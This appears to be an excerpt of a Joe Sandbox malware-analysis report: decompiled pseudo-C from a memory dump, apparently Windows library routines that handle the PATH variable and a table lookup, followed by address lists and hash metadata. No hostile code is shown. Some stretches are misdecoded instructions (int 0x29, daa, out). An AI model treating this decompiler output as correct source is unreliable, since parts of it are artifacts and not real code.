                                  						_t334 = L03444620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
                                  						_v52 = _t334;
                                  						__eflags = _t334;
                                  						if(_t334 == 0) {
                                  							_t335 = 0xc0000017;
                                  							goto L32;
                                  						} else {
                                  							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
                                  							_t50 = _t334 + 0x48; // 0x48
                                  							_t329 = _t50;
                                  							_t315 = _v32;
                                  							 *((intOrPtr*)(_t334 + 0x3c)) = _t278;
                                  							_t280 = 0;
                                  							 *((short*)(_t334 + 0x30)) = _v48;
                                  							__eflags = _t315;
                                  							if(_t315 != 0) {
                                  								 *(_t334 + 0x18) = _t329;
                                  								__eflags = _t315 - 0x3518478;
                                  								 *_t334 = ((0 | _t315 == 0x03518478) - 0x00000001 & 0xfffffffb) + 7;
                                  								E0346F3E0(_t329,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                                  								_t315 = _v32;
                                  								_t354 = _t354 + 0xc;
                                  								_t280 = 1;
                                  								__eflags = _a8;
                                  								_t329 = _t329 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                                  								if(_a8 != 0) {
                                  									_t272 = E034B39F2(_t329);
                                  									_t315 = _v32;
                                  									_t329 = _t272;
                                  								}
                                  							}
                                  							_t294 = 0;
                                  							_v16 = 0;
                                  							__eflags = _v48;
                                  							if(_v48 <= 0) {
                                  								L31:
                                  								_t335 = _v68;
                                  								__eflags = 0;
                                  								 *((short*)(_t329 - 2)) = 0;
                                  								goto L32;
                                  							} else {
                                  								_t282 = _t334 + _t280 * 4;
                                  								_v56 = _t282;
                                  								do {
                                  									__eflags = _t315;
                                  									if(_t315 != 0) {
                                  										_t237 =  *(_v60 + _t294 * 4);
                                  										__eflags = _t237;
                                  										if(_t237 == 0) {
                                  											goto L30;
                                  										} else {
                                  											__eflags = _t237 == 5;
                                  											if(_t237 == 5) {
                                  												goto L30;
                                  											} else {
                                  												goto L22;
                                  											}
                                  										}
                                  									} else {
                                  										L22:
                                  										 *_t282 =  *(_v60 + _t294 * 4);
                                  										 *(_t282 + 0x18) = _t329;
                                  										_t241 =  *(_v60 + _t294 * 4);
                                  										__eflags = _t241 - 8;
                                  										if(_t241 > 8) {
                                  											goto L56;
                                  										} else {
                                  											switch( *((intOrPtr*)(_t241 * 4 +  &M03452959))) {
                                  												case 0:
                                  													__ax =  *0x3518488;
                                  													__eflags = __ax;
                                  													if(__ax == 0) {
                                  														goto L29;
                                  													} else {
                                  														__ax & 0x0000ffff = E0346F3E0(__edi,  *0x351848c, __ax & 0x0000ffff);
                                  														__eax =  *0x3518488 & 0x0000ffff;
                                  														goto L26;
                                  													}
                                  													goto L108;
                                  												case 1:
                                  													L45:
                                  													E0346F3E0(_t329, _v80, _v64);
                                  													_t267 = _v64;
                                  													goto L26;
                                  												case 2:
                                  													 *0x3518480 & 0x0000ffff = E0346F3E0(__edi,  *0x3518484,  *0x3518480 & 0x0000ffff);
                                  													__eax =  *0x3518480 & 0x0000ffff;
                                  													__eax = ( *0x3518480 & 0x0000ffff) >> 1;
                                  													__edi = __edi + __eax * 2;
                                  													goto L28;
                                  												case 3:
                                  													__eax = _v44;
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														goto L29;
                                  													} else {
                                  														__esi = __eax + __eax;
                                  														__eax = E0346F3E0(__edi, _v72, __esi);
                                  														__edi = __edi + __esi;
                                  														__esi = _v52;
                                  														goto L27;
                                  													}
                                  													goto L108;
                                  												case 4:
                                  													_push(0x2e);
                                  													_pop(__eax);
                                  													 *(__esi + 0x44) = __edi;
                                  													 *__edi = __ax;
                                  													__edi = __edi + 4;
                                  													_push(0x3b);
                                  													_pop(__eax);
                                  													 *(__edi - 2) = __ax;
                                  													goto L29;
                                  												case 5:
                                  													__eflags = _v36;
                                  													if(_v36 == 0) {
                                  														goto L45;
                                  													} else {
                                  														E0346F3E0(_t329, _v76, _v36);
                                  														_t267 = _v36;
                                  													}
                                  													L26:
                                  													_t354 = _t354 + 0xc;
                                  													_t329 = _t329 + (_t267 >> 1) * 2 + 2;
                                  													__eflags = _t329;
                                  													L27:
                                  													_push(0x3b);
                                  													_pop(_t269);
                                  													 *((short*)(_t329 - 2)) = _t269;
                                  													goto L28;
                                  												case 6:
                                  													__ebx =  *0x351575c;
                                  													__eflags = __ebx - 0x351575c;
                                  													if(__ebx != 0x351575c) {
                                  														_push(0x3b);
                                  														_pop(__esi);
                                  														do {
                                  															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                  															E0346F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                  															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                  															__edi = __edi + __eax * 2;
                                  															__edi = __edi + 2;
                                  															 *(__edi - 2) = __si;
                                  															__ebx =  *__ebx;
                                  															__eflags = __ebx - 0x351575c;
                                  														} while (__ebx != 0x351575c);
                                  														__esi = _v52;
                                  														__ecx = _v16;
                                  														__edx = _v32;
                                  													}
                                  													__ebx = _v56;
                                  													goto L29;
                                  												case 7:
                                  													 *0x3518478 & 0x0000ffff = E0346F3E0(__edi,  *0x351847c,  *0x3518478 & 0x0000ffff);
                                  													__eax =  *0x3518478 & 0x0000ffff;
                                  													__eax = ( *0x3518478 & 0x0000ffff) >> 1;
                                  													__eflags = _a8;
                                  													__edi = __edi + __eax * 2;
                                  													if(_a8 != 0) {
                                  														__ecx = __edi;
                                  														__eax = E034B39F2(__ecx);
                                  														__edi = __eax;
                                  													}
                                  													goto L28;
                                  												case 8:
                                  													__eax = 0;
                                  													 *(__edi - 2) = __ax;
                                  													 *0x3516e58 & 0x0000ffff = E0346F3E0(__edi,  *0x3516e5c,  *0x3516e58 & 0x0000ffff);
                                  													 *(__esi + 0x38) = __edi;
                                  													__eax =  *0x3516e58 & 0x0000ffff;
                                  													__eax = ( *0x3516e58 & 0x0000ffff) >> 1;
                                  													__edi = __edi + __eax * 2;
                                  													__edi = __edi + 2;
                                  													L28:
                                  													_t294 = _v16;
                                  													_t315 = _v32;
                                  													L29:
                                  													_t282 = _t282 + 4;
                                  													__eflags = _t282;
                                  													_v56 = _t282;
                                  													goto L30;
                                  											}
                                  										}
                                  									}
                                  									goto L108;
                                  									L30:
                                  									_t294 = _t294 + 1;
                                  									_v16 = _t294;
                                  									__eflags = _t294 - _v48;
                                  								} while (_t294 < _v48);
                                  								goto L31;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					while(1) {
                                  						L1:
                                  						_t241 =  *(_v60 + _t327 * 4);
                                  						if(_t241 > 8) {
                                  							break;
                                  						}
                                  						switch( *((intOrPtr*)(_t241 * 4 +  &M03452935))) {
                                  							case 0:
                                  								__ax =  *0x3518488;
                                  								__eflags = __ax;
                                  								if(__ax != 0) {
                                  									__eax = __ax & 0x0000ffff;
                                  									__ebx = __ebx + 2;
                                  									__eflags = __ebx;
                                  									goto L53;
                                  								}
                                  								goto L14;
                                  							case 1:
                                  								L44:
                                  								_t315 =  &_v64;
                                  								_v80 = E03452E3E(0,  &_v64);
                                  								_t278 = _t278 + _v64 + 2;
                                  								goto L13;
                                  							case 2:
                                  								__eax =  *0x3518480 & 0x0000ffff;
                                  								__ebx = __ebx + __eax;
                                  								__eflags = __dl;
                                  								if(__dl != 0) {
                                  									__eax = 0x3518480;
                                  									goto L80;
                                  								}
                                  								goto L14;
                                  							case 3:
                                  								__eax = E0343EEF0(0x35179a0);
                                  								__eax =  &_v44;
                                  								_push(__eax);
                                  								_push(0);
                                  								_push(0);
                                  								_push(4);
                                  								_push(L"PATH");
                                  								_push(0);
                                  								L57();
                                  								__esi = __eax;
                                  								_v68 = __esi;
                                  								__eflags = __esi - 0xc0000023;
                                  								if(__esi != 0xc0000023) {
                                  									L10:
                                  									__eax = E0343EB70(__ecx, 0x35179a0);
                                  									__eflags = __esi - 0xc0000100;
                                  									if(__esi == 0xc0000100) {
                                  										_v44 = _v44 & 0x00000000;
                                  										__eax = 0;
                                  										_v68 = 0;
                                  										goto L13;
                                  									} else {
                                  										__eflags = __esi;
                                  										if(__esi < 0) {
                                  											L32:
                                  											_t215 = _v72;
                                  											__eflags = _t215;
                                  											if(_t215 != 0) {
                                  												L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                                  											}
                                  											_t216 = _v52;
                                  											__eflags = _t216;
                                  											if(_t216 != 0) {
                                  												__eflags = _t335;
                                  												if(_t335 < 0) {
                                  													L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                                  													_t216 = 0;
                                  												}
                                  											}
                                  											goto L36;
                                  										} else {
                                  											__eax = _v44;
                                  											__ebx = __ebx + __eax * 2;
                                  											__ebx = __ebx + 2;
                                  											__eflags = __ebx;
                                  											L13:
                                  											_t290 = _v36;
                                  											goto L14;
                                  										}
                                  									}
                                  								} else {
                                  									__eax = _v44;
                                  									__ecx =  *0x3517b9c; // 0x0
                                  									_v44 + _v44 =  *[fs:0x30];
                                  									__ecx = __ecx + 0x180000;
                                  									__eax = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                  									_v72 = __eax;
                                  									__eflags = __eax;
                                  									if(__eax == 0) {
                                  										__eax = E0343EB70(__ecx, 0x35179a0);
                                  										__eax = _v52;
                                  										L36:
                                  										_pop(_t328);
                                  										_pop(_t336);
                                  										__eflags = _v8 ^ _t342;
                                  										_pop(_t279);
                                  										return E0346B640(_t216, _t279, _v8 ^ _t342, _t315, _t328, _t336);
                                  									} else {
                                  										__ecx =  &_v44;
                                  										_push(__ecx);
                                  										_push(_v44);
                                  										_push(__eax);
                                  										_push(4);
                                  										_push(L"PATH");
                                  										_push(0);
                                  										L57();
                                  										__esi = __eax;
                                  										_v68 = __eax;
                                  										goto L10;
                                  									}
                                  								}
                                  								goto L108;
                                  							case 4:
                                  								__ebx = __ebx + 4;
                                  								goto L14;
                                  							case 5:
                                  								_t274 = _v56;
                                  								if(_v56 != 0) {
                                  									_t315 =  &_v36;
                                  									_t276 = E03452E3E(_t274,  &_v36);
                                  									_t290 = _v36;
                                  									_v76 = _t276;
                                  								}
                                  								if(_t290 == 0) {
                                  									goto L44;
                                  								} else {
                                  									_t278 = _t278 + 2 + _t290;
                                  								}
                                  								goto L14;
                                  							case 6:
                                  								__eax =  *0x3515764 & 0x0000ffff;
                                  								goto L53;
                                  							case 7:
                                  								__eax =  *0x3518478 & 0x0000ffff;
                                  								__ebx = __ebx + __eax;
                                  								__eflags = _a8;
                                  								if(_a8 != 0) {
                                  									__ebx = __ebx + 0x16;
                                  									__ebx = __ebx + __eax;
                                  								}
                                  								__eflags = __dl;
                                  								if(__dl != 0) {
                                  									__eax = 0x3518478;
                                  									L80:
                                  									_v32 = __eax;
                                  								}
                                  								goto L14;
                                  							case 8:
                                  								__eax =  *0x3516e58 & 0x0000ffff;
                                  								__eax = ( *0x3516e58 & 0x0000ffff) + 2;
                                  								L53:
                                  								__ebx = __ebx + __eax;
                                  								L14:
                                  								_t327 = _t327 + 1;
                                  								if(_t327 >= _v48) {
                                  									goto L16;
                                  								} else {
                                  									_t315 = _v37;
                                  									goto L1;
                                  								}
                                  								goto L108;
                                  						}
                                  					}
                                  					L56:
                                  					asm("int 0x29");
                                  					asm("out 0x28, al");
                                  					_t357 = _t354 +  *((intOrPtr*)(_t334 + 0x28)) + _t241;
                                  					asm("daa");
                                  					_t244 = _t241 +  *((intOrPtr*)(_t334 + 0x28)) +  *0x1f034526 +  *((intOrPtr*)(_t315 +  *((intOrPtr*)(_t241 +  *((intOrPtr*)(_t334 + 0x28)) +  *0x1f034526 +  &_a1530200897))));
                                  					_v1 = _v1 - _t244;
                                  					 *_t244 =  *_t244 - 0x45;
                                  					asm("daa");
                                  					_v1 = _v1 - _t244;
                                  					_v1 = _v1 - _t244;
                                  					asm("daa");
                                  					_t286 = 0x25;
                                  					_t339 = _t334 + _t334 - 1 +  *((intOrPtr*)(_t244 +  &_a1546912577));
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					_push(0x20);
                                  					_push(0x34fff00);
                                  					E0347D08C(_t286, _t329, _t339);
                                  					_v44 =  *[fs:0x18];
                                  					_t330 = 0;
                                  					 *_a24 = 0;
                                  					_t287 = _a12;
                                  					__eflags = _t287;
                                  					if(_t287 == 0) {
                                  						_t247 = 0xc0000100;
                                  					} else {
                                  						_v8 = 0;
                                  						_t340 = 0xc0000100;
                                  						_v52 = 0xc0000100;
                                  						_t249 = 4;
                                  						while(1) {
                                  							_v40 = _t249;
                                  							__eflags = _t249;
                                  							if(_t249 == 0) {
                                  								break;
                                  							}
                                  							_t305 = _t249 * 0xc;
                                  							_v48 = _t305;
                                  							__eflags = _t287 -  *((intOrPtr*)(_t305 + 0x3401664));
                                  							if(__eflags <= 0) {
                                  								if(__eflags == 0) {
                                  									_t264 = E0346E5C0(_a8,  *((intOrPtr*)(_t305 + 0x3401668)), _t287);
                                  									_t357 = _t357 + 0xc;
                                  									__eflags = _t264;
                                  									if(__eflags == 0) {
                                  										_t340 = E034A51BE(_t287,  *((intOrPtr*)(_v48 + 0x340166c)), _a16, _t330, _t340, __eflags, _a20, _a24);
                                  										_v52 = _t340;
                                  										break;
                                  									} else {
                                  										_t249 = _v40;
                                  										goto L62;
                                  									}
                                  									goto L70;
                                  								} else {
                                  									L62:
                                  									_t249 = _t249 - 1;
                                  									continue;
                                  								}
                                  							}
                                  							break;
                                  						}
                                  						_v32 = _t340;
                                  						__eflags = _t340;
                                  						if(_t340 < 0) {
                                  							__eflags = _t340 - 0xc0000100;
                                  							if(_t340 == 0xc0000100) {
                                  								_t301 = _a4;
                                  								__eflags = _t301;
                                  								if(_t301 != 0) {
                                  									_v36 = _t301;
                                  									__eflags =  *_t301 - _t330;
                                  									if( *_t301 == _t330) {
                                  										_t340 = 0xc0000100;
                                  										goto L76;
                                  									} else {
                                  										_t318 =  *((intOrPtr*)(_v44 + 0x30));
                                  										_t251 =  *((intOrPtr*)(_t318 + 0x10));
                                  										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t301;
                                  										if( *((intOrPtr*)(_t251 + 0x48)) == _t301) {
                                  											__eflags =  *(_t318 + 0x1c);
                                  											if( *(_t318 + 0x1c) == 0) {
                                  												L106:
                                  												_t340 = E03452AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
                                  												_v32 = _t340;
                                  												__eflags = _t340 - 0xc0000100;
                                  												if(_t340 != 0xc0000100) {
                                  													goto L69;
                                  												} else {
                                  													_t330 = 1;
                                  													_t301 = _v36;
                                  													goto L75;
                                  												}
                                  											} else {
                                  												_t254 = E03436600( *(_t318 + 0x1c));
                                  												__eflags = _t254;
                                  												if(_t254 != 0) {
                                  													goto L106;
                                  												} else {
                                  													_t301 = _a4;
                                  													goto L75;
                                  												}
                                  											}
                                  										} else {
                                  											L75:
                                  											_t340 = E03452C50(_t301, _a8, _t287, _a16, _a20, _a24, _t330);
                                  											L76:
                                  											_v32 = _t340;
                                  											goto L69;
                                  										}
                                  									}
                                  									goto L108;
                                  								} else {
                                  									E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  									_v8 = 1;
                                  									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                  									_t340 = _a24;
                                  									_t261 = E03452AE4( &_v36, _a8, _t287, _a16, _a20, _t340);
                                  									_v32 = _t261;
                                  									__eflags = _t261 - 0xc0000100;
                                  									if(_t261 == 0xc0000100) {
                                  										_v32 = E03452C50(_v36, _a8, _t287, _a16, _a20, _t340, 1);
                                  									}
                                  									_v8 = _t330;
                                  									E03452ACB();
                                  								}
                                  							}
                                  						}
                                  						L69:
                                  						_v8 = 0xfffffffe;
                                  						_t247 = _t340;
                                  					}
                                  					L70:
                                  					return E0347D0D1(_t247);
                                  				}
                                  				L108:
                                  			}






















































                                  0x03452584
                                  0x03452586
                                  0x03452590
                                  0x03452596
                                  0x03452597
                                  0x03452598
                                  0x03452599
                                  0x0345259e
                                  0x034525a4
                                  0x034525a9
                                  0x034525ac
                                  0x034525ae
                                  0x034525b1
                                  0x034525b2
                                  0x034525b5
                                  0x034525b8
                                  0x034525bb
                                  0x034525bc
                                  0x034525bf
                                  0x034525c2
                                  0x034525c5
                                  0x034525c6
                                  0x034525cb
                                  0x034525ce
                                  0x034525d8
                                  0x034525dd
                                  0x034525de
                                  0x034525e1
                                  0x034525e3
                                  0x034525e9
                                  0x034526da
                                  0x034526da
                                  0x034526dd
                                  0x034526e2
                                  0x03495b56
                                  0x00000000
                                  0x034526e8
                                  0x034526f9
                                  0x034526fb
                                  0x034526fe
                                  0x03452700
                                  0x03495b60
                                  0x00000000
                                  0x03452706
                                  0x03452706
                                  0x0345270a
                                  0x0345270a
                                  0x0345270d
                                  0x03452713
                                  0x03452716
                                  0x03452718
                                  0x0345271c
                                  0x0345271e
                                  0x03495b6c
                                  0x03495b6f
                                  0x03495b7f
                                  0x03495b89
                                  0x03495b8e
                                  0x03495b93
                                  0x03495b96
                                  0x03495b9c
                                  0x03495ba0
                                  0x03495ba3
                                  0x03495bab
                                  0x03495bb0
                                  0x03495bb3
                                  0x03495bb3
                                  0x03495ba3
                                  0x03452724
                                  0x03452726
                                  0x03452729
                                  0x0345272c
                                  0x0345279d
                                  0x0345279d
                                  0x034527a0
                                  0x034527a2
                                  0x00000000
                                  0x0345272e
                                  0x0345272e
                                  0x03452731
                                  0x03452734
                                  0x03452734
                                  0x03452736
                                  0x03495bc1
                                  0x03495bc1
                                  0x03495bc4
                                  0x00000000
                                  0x03495bca
                                  0x03495bca
                                  0x03495bcd
                                  0x00000000
                                  0x03495bd3
                                  0x00000000
                                  0x03495bd3
                                  0x03495bcd
                                  0x0345273c
                                  0x0345273c
                                  0x03452742
                                  0x03452747
                                  0x0345274a
                                  0x0345274d
                                  0x03452750
                                  0x00000000
                                  0x03452756
                                  0x03452756
                                  0x00000000
                                  0x03452902
                                  0x03452908
                                  0x0345290b
                                  0x00000000
                                  0x03452911
                                  0x0345291c
                                  0x03452921
                                  0x00000000
                                  0x03452921
                                  0x00000000
                                  0x00000000
                                  0x03452880
                                  0x03452887
                                  0x0345288c
                                  0x00000000
                                  0x00000000
                                  0x03452805
                                  0x0345280a
                                  0x03452814
                                  0x03452816
                                  0x00000000
                                  0x00000000
                                  0x0345281e
                                  0x03452821
                                  0x03452823
                                  0x00000000
                                  0x03452829
                                  0x03452829
                                  0x03452831
                                  0x0345283c
                                  0x0345283e
                                  0x00000000
                                  0x0345283e
                                  0x00000000
                                  0x00000000
                                  0x0345284e
                                  0x03452850
                                  0x03452851
                                  0x03452854
                                  0x03452857
                                  0x0345285a
                                  0x0345285c
                                  0x0345285d
                                  0x00000000
                                  0x00000000
                                  0x0345275d
                                  0x03452761
                                  0x00000000
                                  0x03452767
                                  0x0345276e
                                  0x03452773
                                  0x03452773
                                  0x03452776
                                  0x03452778
                                  0x0345277e
                                  0x0345277e
                                  0x03452781
                                  0x03452781
                                  0x03452783
                                  0x03452784
                                  0x00000000
                                  0x00000000
                                  0x03495bd8
                                  0x03495bde
                                  0x03495be4
                                  0x03495be6
                                  0x03495be8
                                  0x03495be9
                                  0x03495bee
                                  0x03495bf8
                                  0x03495bff
                                  0x03495c01
                                  0x03495c04
                                  0x03495c07
                                  0x03495c0b
                                  0x03495c0d
                                  0x03495c0d
                                  0x03495c15
                                  0x03495c18
                                  0x03495c1b
                                  0x03495c1b
                                  0x03495c1e
                                  0x00000000
                                  0x00000000
                                  0x034528c3
                                  0x034528c8
                                  0x034528d2
                                  0x034528d4
                                  0x034528d8
                                  0x034528db
                                  0x03495c26
                                  0x03495c28
                                  0x03495c2d
                                  0x03495c2d
                                  0x00000000
                                  0x00000000
                                  0x03495c34
                                  0x03495c36
                                  0x03495c49
                                  0x03495c4e
                                  0x03495c54
                                  0x03495c5b
                                  0x03495c5d
                                  0x03495c60
                                  0x03452788
                                  0x03452788
                                  0x0345278b
                                  0x0345278e
                                  0x0345278e
                                  0x0345278e
                                  0x03452791
                                  0x00000000
                                  0x00000000
                                  0x03452756
                                  0x03452750
                                  0x00000000
                                  0x03452794
                                  0x03452794
                                  0x03452795
                                  0x03452798
                                  0x03452798
                                  0x00000000
                                  0x03452734
                                  0x0345272c
                                  0x03452700
                                  0x034525ef
                                  0x034525ef
                                  0x034525ef
                                  0x034525f2
                                  0x034525f8
                                  0x00000000
                                  0x00000000
                                  0x034525fe
                                  0x00000000
                                  0x034528e6
                                  0x034528ec
                                  0x034528ef
                                  0x034528f5
                                  0x034528f8
                                  0x034528f8
                                  0x00000000
                                  0x034528f8
                                  0x00000000
                                  0x00000000
                                  0x03452866
                                  0x03452866
                                  0x03452876
                                  0x03452879
                                  0x00000000
                                  0x00000000
                                  0x034527e0
                                  0x034527e7
                                  0x034527e9
                                  0x034527eb
                                  0x03495afd
                                  0x00000000
                                  0x03495afd
                                  0x00000000
                                  0x00000000
                                  0x03452633
                                  0x03452638
                                  0x0345263b
                                  0x0345263c
                                  0x0345263e
                                  0x03452640
                                  0x03452642
                                  0x03452647
                                  0x03452649
                                  0x0345264e
                                  0x03452650
                                  0x03452653
                                  0x03452659
                                  0x034526a2
                                  0x034526a7
                                  0x034526ac
                                  0x034526b2
                                  0x03495b11
                                  0x03495b15
                                  0x03495b17
                                  0x00000000
                                  0x034526b8
                                  0x034526b8
                                  0x034526ba
                                  0x034527a6
                                  0x034527a6
                                  0x034527a9
                                  0x034527ab
                                  0x034527b9
                                  0x034527b9
                                  0x034527be
                                  0x034527c1
                                  0x034527c3
                                  0x034527c5
                                  0x034527c7
                                  0x03495c74
                                  0x03495c79
                                  0x03495c79
                                  0x034527c7
                                  0x00000000
                                  0x034526c0
                                  0x034526c0
                                  0x034526c3
                                  0x034526c6
                                  0x034526c6
                                  0x034526c9
                                  0x034526c9
                                  0x00000000
                                  0x034526c9
                                  0x034526ba
                                  0x0345265b
                                  0x0345265b
                                  0x0345265e
                                  0x03452667
                                  0x0345266d
                                  0x03452677
                                  0x0345267c
                                  0x0345267f
                                  0x03452681
                                  0x03495b49
                                  0x03495b4e
                                  0x034527cd
                                  0x034527d0
                                  0x034527d1
                                  0x034527d2
                                  0x034527d4
                                  0x034527dd
                                  0x03452687
                                  0x03452687
                                  0x0345268a
                                  0x0345268b
                                  0x0345268e
                                  0x0345268f
                                  0x03452691
                                  0x03452696
                                  0x03452698
                                  0x0345269d
                                  0x0345269f
                                  0x00000000
                                  0x0345269f
                                  0x03452681
                                  0x00000000
                                  0x00000000
                                  0x03452846
                                  0x00000000
                                  0x00000000
                                  0x03452605
                                  0x0345260a
                                  0x0345260c
                                  0x03452611
                                  0x03452616
                                  0x03452619
                                  0x03452619
                                  0x0345261e
                                  0x00000000
                                  0x03452624
                                  0x03452627
                                  0x03452627
                                  0x00000000
                                  0x00000000
                                  0x03495b1f
                                  0x00000000
                                  0x00000000
                                  0x03452894
                                  0x0345289b
                                  0x0345289d
                                  0x034528a1
                                  0x03495b2b
                                  0x03495b2e
                                  0x03495b2e
                                  0x034528a7
                                  0x034528a9
                                  0x03495b04
                                  0x03495b09
                                  0x03495b09
                                  0x03495b09
                                  0x00000000
                                  0x00000000
                                  0x03495b35
                                  0x03495b3c
                                  0x034528fb
                                  0x034528fb
                                  0x034526cc
                                  0x034526cc
                                  0x034526d0
                                  0x00000000
                                  0x034526d2
                                  0x034526d2
                                  0x00000000
                                  0x034526d2
                                  0x00000000
                                  0x00000000
                                  0x034525fe
                                  0x0345292d
                                  0x03452930
                                  0x03452935
                                  0x0345293c
                                  0x0345293e
                                  0x03452958
                                  0x0345295a
                                  0x0345295d
                                  0x03452962
                                  0x03452966
                                  0x0345296a
                                  0x0345296e
                                  0x03452972
                                  0x03452974
                                  0x0345297e
                                  0x0345297f
                                  0x03452980
                                  0x03452981
                                  0x03452982
                                  0x03452983
                                  0x03452984
                                  0x03452985
                                  0x03452986
                                  0x03452987
                                  0x03452988
                                  0x03452989
                                  0x0345298a
                                  0x0345298b
                                  0x0345298c
                                  0x0345298d
                                  0x0345298e
                                  0x0345298f
                                  0x03452990
                                  0x03452992
                                  0x03452997
                                  0x034529a3
                                  0x034529a6
                                  0x034529ab
                                  0x034529ad
                                  0x034529b0
                                  0x034529b2
                                  0x03495c80
                                  0x034529b8
                                  0x034529b8
                                  0x034529bb
                                  0x034529c0
                                  0x034529c5
                                  0x034529c6
                                  0x034529c6
                                  0x034529c9
                                  0x034529cb
                                  0x00000000
                                  0x00000000
                                  0x034529cd
                                  0x034529d0
                                  0x034529d9
                                  0x034529db
                                  0x034529dd
                                  0x03452a7f
                                  0x03452a84
                                  0x03452a87
                                  0x03452a89
                                  0x03495ca1
                                  0x03495ca3
                                  0x00000000
                                  0x03452a8f
                                  0x03452a8f
                                  0x00000000
                                  0x03452a8f
                                  0x00000000
                                  0x034529e3
                                  0x034529e3
                                  0x034529e3
                                  0x00000000
                                  0x034529e3
                                  0x034529dd
                                  0x00000000
                                  0x034529db
                                  0x034529e6
                                  0x034529e9
                                  0x034529eb
                                  0x034529ed
                                  0x034529f3
                                  0x034529f5
                                  0x034529f8
                                  0x034529fa
                                  0x03452a97
                                  0x03452a9a
                                  0x03452a9d
                                  0x03452add
                                  0x00000000
                                  0x03452a9f
                                  0x03452aa2
                                  0x03452aa5
                                  0x03452aa8
                                  0x03452aab
                                  0x03495cab
                                  0x03495caf
                                  0x03495cc5
                                  0x03495cda
                                  0x03495cdc
                                  0x03495cdf
                                  0x03495ce5
                                  0x00000000
                                  0x03495ceb
                                  0x03495ced
                                  0x03495cee
                                  0x00000000
                                  0x03495cee
                                  0x03495cb1
                                  0x03495cb4
                                  0x03495cb9
                                  0x03495cbb
                                  0x00000000
                                  0x03495cbd
                                  0x03495cbd
                                  0x00000000
                                  0x03495cbd
                                  0x03495cbb
                                  0x03452ab1
                                  0x03452ab1
                                  0x03452ac4
                                  0x03452ac6
                                  0x03452ac6
                                  0x00000000
                                  0x03452ac6
                                  0x03452aab
                                  0x00000000
                                  0x03452a00
                                  0x03452a09
                                  0x03452a0e
                                  0x03452a21
                                  0x03452a24
                                  0x03452a35
                                  0x03452a3a
                                  0x03452a3d
                                  0x03452a42
                                  0x03452a59
                                  0x03452a59
                                  0x03452a5c
                                  0x03452a5f
                                  0x03452a5f
                                  0x034529fa
                                  0x034529f3
                                  0x03452a64
                                  0x03452a64
                                  0x03452a6b
                                  0x03452a6b
                                  0x03452a6d
                                  0x03452a72
                                  0x03452a72
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 0b4c59be1489cba98bac60eb77773bdffeb5030b4208cb598a546524a640b5ab
                                  • Instruction ID: add1b49792493921311ff8f11a2cace770a1586c45354ac7e6233f50726b2ad5
                                  • Opcode Fuzzy Hash: 0b4c59be1489cba98bac60eb77773bdffeb5030b4208cb598a546524a640b5ab
                                  • Instruction Fuzzy Hash: ACC19075E002199FDB15DF99D880AAEB7B0FF48700F18442BF811AF361D7B4A946CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E0345FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                  				char _v5;
                                  				signed int _v8;
                                  				signed int _v12;
                                  				char _v16;
                                  				char _v17;
                                  				char _v20;
                                  				signed int _v24;
                                  				char _v28;
                                  				char _v32;
                                  				signed int _v40;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __ebp;
                                  				signed int _t73;
                                  				intOrPtr* _t75;
                                  				signed int _t77;
                                  				signed int _t79;
                                  				signed int _t81;
                                  				intOrPtr _t83;
                                  				intOrPtr _t85;
                                  				intOrPtr _t86;
                                  				signed int _t91;
                                  				signed int _t94;
                                  				signed int _t95;
                                  				signed int _t96;
                                  				signed int _t106;
                                  				signed int _t108;
                                  				signed int _t114;
                                  				signed int _t116;
                                  				signed int _t118;
                                  				signed int _t122;
                                  				signed int _t123;
                                  				void* _t129;
                                  				signed int _t130;
                                  				void* _t132;
                                  				intOrPtr* _t134;
                                  				signed int _t138;
                                  				signed int _t141;
                                  				signed int _t147;
                                  				intOrPtr _t153;
                                  				signed int _t154;
                                  				signed int _t155;
                                  				signed int _t170;
                                  				void* _t174;
                                  				signed int _t176;
                                  				signed int _t177;
                                  
                                  				_t129 = __ebx;
                                  				_push(_t132);
                                  				_push(__esi);
                                  				_t174 = _t132;
                                  				_t73 =  !( *( *(_t174 + 0x18)));
                                  				if(_t73 >= 0) {
                                  					L5:
                                  					return _t73;
                                  				} else {
                                  					E0343EEF0(0x3517b60);
                                  					_t134 =  *0x3517b84; // 0x77e07b80
                                  					_t2 = _t174 + 0x24; // 0x24
                                  					_t75 = _t2;
                                  					if( *_t134 != 0x3517b80) {
                                  						_push(3);
                                  						asm("int 0x29");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
